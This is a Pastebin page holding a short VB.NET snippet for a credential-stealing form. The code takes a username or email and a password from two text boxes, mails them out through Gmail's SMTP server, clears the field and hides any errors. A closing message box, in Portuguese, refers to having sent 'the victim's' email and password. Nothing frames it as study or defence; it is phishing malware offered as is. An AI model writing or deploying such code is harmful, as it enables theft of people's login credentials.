Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Dim MyMailMessage As New MailMessage()
- Try
- MyMailMessage.Subject = "Usuario ou email:" + TextBox1.Text
- MyMailMessage.Body = "Senha:" + TextBox2.Text
- Dim SMTP As New SmtpClient("smtp.gmail.com")
- SMTP.Port = 587
- SMTP.EnableSsl = True
- SMTP.Send(MyMailMessage)
- TextBox2.Text = ""
- Catch ex As Exception
- End Try
- MsgBox("Alguma mensagem depois de enviar o e-mail e a senha da vitima")
Advertisement
Add Comment
Please, Sign In to add comment